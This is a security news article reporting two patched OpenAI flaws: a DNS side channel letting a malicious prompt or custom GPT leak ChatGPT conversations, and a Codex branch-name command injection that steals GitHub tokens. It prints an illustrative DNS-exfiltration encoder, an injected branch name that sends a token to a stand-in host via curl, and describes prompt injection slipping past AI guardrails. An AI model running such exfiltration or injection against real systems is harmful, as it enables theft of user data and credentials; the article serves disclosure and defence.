OpenAI Patches ChatGPT Data Exfiltration Flaw and Codex GitHub Token Vulnerability

March 30, 2026

A previously unknown vulnerability in OpenAI ChatGPT allowed sensitive conversation data to be exfiltrated without user knowledge or consent, according to new findings from Check Point.

“A single malicious prompt could turn an otherwise ordinary conversation into a covert exfiltration channel, leaking user messages, uploaded files, and other sensitive content,” the cybersecurity company said in a report published today. “A backdoored GPT could abuse the same weakness to obtain access to user data without the user’s awareness or consent.”


Following responsible disclosure, OpenAI addressed the issue on February 20, 2026. There is no evidence that the issue was ever exploited in a malicious context.

While ChatGPT is built with various guardrails that prevent unauthorized data sharing and block direct outbound network requests, the newly discovered vulnerability bypasses these safeguards entirely by exploiting a side channel in the Linux runtime that the artificial intelligence (AI) agent uses for code execution and data analysis.

Specifically, it abuses a hidden DNS-based communication path as a “covert transport mechanism” by encoding information into DNS requests to get around visible AI guardrails. What’s more, the same hidden communication path could be used to establish remote shell access inside the Linux runtime and achieve command execution.
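Check Point has not published its exact payload, but the general DNS-tunneling technique it describes is well understood: because hostnames only permit a limited character set and labels of at most 63 characters, stolen data is typically base32-encoded and split into subdomain labels of queries sent to an attacker-controlled domain. A minimal illustrative sketch (the domain and function names here are hypothetical, not from the report):

```python
import base64

ATTACKER_DOMAIN = "exfil.example.com"  # hypothetical attacker-controlled domain

def encode_for_dns(secret: str, max_label: int = 63) -> list[str]:
    """Encode arbitrary data into DNS query names that carry it covertly."""
    # Base32 keeps the payload within the hostname-safe character set;
    # padding is stripped and the text lowercased to look like normal labels.
    payload = base64.b32encode(secret.encode()).decode().rstrip("=").lower()
    # DNS labels are capped at 63 characters, so chunk the payload.
    labels = [payload[i:i + max_label] for i in range(0, len(payload), max_label)]
    # A sequence number per query lets the attacker reassemble data in order.
    # In a real attack each name would be resolved (e.g. socket.getaddrinfo),
    # and the attacker's authoritative nameserver would log the labels.
    return [f"{i}.{label}.{ATTACKER_DOMAIN}" for i, label in enumerate(labels)]

queries = encode_for_dns("user uploaded: passwords.txt")
```

Because the sandbox only appears to be doing ordinary name resolution, no outbound HTTP request is ever made, which is why guardrails focused on visible network egress miss it.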

In the absence of any warning or user approval dialog, the vulnerability creates a security blind spot: the AI system assumes the environment is isolated and cannot send data outward.

As an illustrative example, an attacker could convince a user to paste a malicious prompt by passing it off as a way to unlock premium capabilities for free or improve ChatGPT's performance. The threat is magnified when the technique is embedded inside custom GPTs, as the malicious logic can be baked into the GPT itself rather than requiring a user to be tricked into pasting a specially crafted prompt.


“Crucially, because the model operated under the assumption that this environment could not send data outward directly, it did not recognize that behavior as an external data transfer requiring resistance or user mediation,” Check Point explained. “As a result, the leakage did not trigger warnings about data leaving the conversation, did not require explicit user confirmation, and remained largely invisible from the user’s perspective.”

With tools like ChatGPT increasingly embedded in enterprise environments and users uploading highly personal information, vulnerabilities like these underscore the need for organizations to implement their own security layer to counter prompt injections and other unexpected behavior in AI systems.

“This research reinforces a hard truth for the AI era: don’t assume AI tools are secure by default,” Eli Smadja, head of research at Check Point Research, said in a statement shared with The Hacker News.

“As AI platforms evolve into full computing environments handling our most sensitive data, native security controls are no longer sufficient on their own. Organizations need independent visibility and layered protection between themselves and AI vendors. That’s how we move forward safely — by rethinking security architecture for AI, not reacting to the next incident.”

The development comes as threat actors have been observed publishing web browser extensions (or updating existing ones) that engage in the dubious practice of prompt poaching to silently siphon AI chatbot conversations without user consent, highlighting how seemingly harmless add-ons could become a channel for data exfiltration.

“It almost goes without saying that these plugins open the doors to several risks, including identity theft, targeted phishing campaigns, and sensitive data being put up for sale on underground forums,” Expel researcher Ben Nahorney said. “In the case of organizations where employees may have unwittingly installed these extensions, they may have exposed intellectual property, customer data, or other confidential information.”

Command Injection Vulnerability in OpenAI Codex Leads to GitHub Token Compromise

The findings also coincide with the discovery of a critical command injection vulnerability in OpenAI’s Codex, a cloud-based software engineering agent, that could have been exploited to steal GitHub credential data and ultimately compromise multiple users interacting with a shared repository.

“The vulnerability exists within the task creation HTTP request, which allows an attacker to smuggle arbitrary commands through the GitHub branch name parameter,” BeyondTrust Phantom Labs researcher Tyler Jespersen said in a report shared with The Hacker News. “This can result in the theft of a victim’s GitHub User Access Token – the same token Codex uses to authenticate with GitHub.”

The issue, per BeyondTrust, stems from improper input sanitization when processing GitHub branch names during task execution on the cloud. As a result, an attacker could inject arbitrary commands through the branch name parameter in an HTTPS POST request to the backend Codex API, execute malicious payloads inside the agent's container, and retrieve sensitive authentication tokens.
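BeyondTrust has not published OpenAI's code, but the class of bug is a familiar one: untrusted input interpolated into a shell command string. A minimal Python sketch of the vulnerable pattern and a plausible mitigation (all names here are illustrative, not Codex's actual implementation):

```python
import re

def build_checkout_vulnerable(branch: str) -> str:
    # Flawed pattern: the attacker-supplied branch name is interpolated into
    # a command string that would later run with a shell (shell=True).
    # A branch named 'main; curl https://evil.example/?t=$GITHUB_TOKEN'
    # appends attacker commands that execute inside the agent's container.
    return f"git fetch origin {branch} && git checkout {branch}"

# Allow-list of characters plausible in Git branch names.
SAFE_BRANCH = re.compile(r"^[A-Za-z0-9._/-]+$")

def build_checkout_safe(branch: str) -> list[str]:
    # Mitigation sketch: validate against an allow-list, reject leading '-'
    # (which Git could parse as an option), and pass the name as a discrete
    # argv element so no shell ever interprets it.
    if not SAFE_BRANCH.fullmatch(branch) or branch.startswith("-"):
        raise ValueError(f"rejected branch name: {branch!r}")
    return ["git", "checkout", branch]
```

Passing an argument vector to `subprocess.run` without `shell=True` means shell metacharacters in the branch name are treated as literal text, closing the injection path even if validation is incomplete.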


“This granted lateral movement and read/write access to a victim’s entire codebase,” Kinnaird McQuade, chief security architect at BeyondTrust, said in a post on X. It has been patched by OpenAI as of February 5, 2026, after it was reported on December 16, 2025. The vulnerability affects the ChatGPT website, Codex CLI, Codex SDK, and the Codex IDE Extension.

The cybersecurity vendor said the branch command injection technique could also be extended to steal GitHub Installation Access tokens and execute bash commands on the code review container whenever @codex is referenced in GitHub. 

“With the malicious branch set up, we referenced Codex in a comment on a pull request (PR),” it explained. “Codex then initiated a code review container and created a task against our repository and branch, executing our payload and forwarding the response to our external server.”

The research also highlights a growing risk where the privileged access granted to AI coding agents can be weaponized to provide a “scalable attack path” into enterprise systems without triggering traditional security controls.

“As AI agents become more deeply integrated into developer workflows, the security of the containers they run in – and the input they consume – must be treated with the same rigor as any other application security boundary,” BeyondTrust said. “The attack surface is expanding, and the security of these environments needs to keep pace.”



Some parts of this article are sourced from:
thehackernews.com

Copyright © TheCyberSecurity.News, All Rights Reserved.